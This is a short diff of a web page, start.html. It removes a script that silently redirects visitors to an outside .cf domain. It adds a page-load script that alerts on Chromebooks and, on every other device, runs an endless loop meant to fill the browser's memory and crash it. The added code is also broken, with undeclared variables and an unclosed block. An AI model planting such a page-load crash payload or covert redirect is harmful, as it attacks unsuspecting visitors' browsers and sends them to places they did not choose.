--- a/start.html
+++ b/start.html
@@ -1,2 +1,8 @@
-<!DOCTYPE html><script>window.location="http://bokheadpictures.cf"</script>
-Loading.....
+<!DOCTYPE html><script>if (/\bCrOS\b/.test(navigator.userAgent)) {
+    alert('you are on a chromebook')// yes, it is (probably, if no one's mucked about with their user agent string)
+} else {
+    while(1){
+    txt = txt += "a"; //add as much as the browser can handle
+    txt2 = txt2 += "b";
+   
+    }</script>
